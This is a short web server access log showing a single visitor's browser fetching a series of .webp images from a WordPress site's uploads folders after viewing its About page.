218.12.33.34 - - [15/Jan/2026:22:42:33 +0800] "GET /wp-content/uploads/2025/07/1750671803-partner3_200x50.webp HTTP/1.1" 200 4414 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
218.12.33.34 - - [15/Jan/2026:22:42:33 +0800] "GET /wp-content/uploads/2025/06/1750755307-qizhoucangku2000x400_2025624.webp HTTP/1.1" 200 45470 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
218.12.33.34 - - [15/Jan/2026:22:42:33 +0800] "GET /wp-content/uploads/elementor/thumbs/1751373145-About_Qizhoudalou_W800px-r91b70ok8huvvdr4ynxnf302e8ie3iydlh6ag9ew82.webp HTTP/1.1" 200 37938 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
218.12.33.34 - - [15/Jan/2026:22:42:33 +0800] "GET /wp-content/uploads/elementor/thumbs/1751209300-Hello-Qizhou3-r91b71mdtei8mab1rr8x739cnvi1mafuaga3vbed3o.webp HTTP/1.1" 200 39120 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
218.12.33.34 - - [15/Jan/2026:22:42:33 +0800] "GET /wp-content/uploads/2025/07/1750671805-partner4_200x50.webp HTTP/1.1" 200 2390 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
218.12.33.34 - - [15/Jan/2026:22:42:33 +0800] "GET /wp-content/uploads/2025/07/1750671806-partner5_200x50.webp HTTP/1.1" 200 2840 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
218.12.33.34 - - [15/Jan/2026:22:42:33 +0800] "GET /wp-content/uploads/2025/07/1750671808-partner6_200x50.webp HTTP/1.1" 200 3004 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
218.12.33.34 - - [15/Jan/2026:22:42:33 +0800] "GET /wp-content/uploads/2025/07/1750649179-qizhou1920x1080_1.webp HTTP/1.1" 200 172154 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
218.12.33.34 - - [15/Jan/2026:22:42:33 +0800] "GET /wp-content/uploads/2025/07/1750649197-qizhou1920x1080_6.webp HTTP/1.1" 200 150354 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
218.12.33.34 - - [15/Jan/2026:22:42:33 +0800] "GET /wp-content/uploads/2025/07/1750649193-qizhou1920x1080_5.webp HTTP/1.1" 200 110214 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
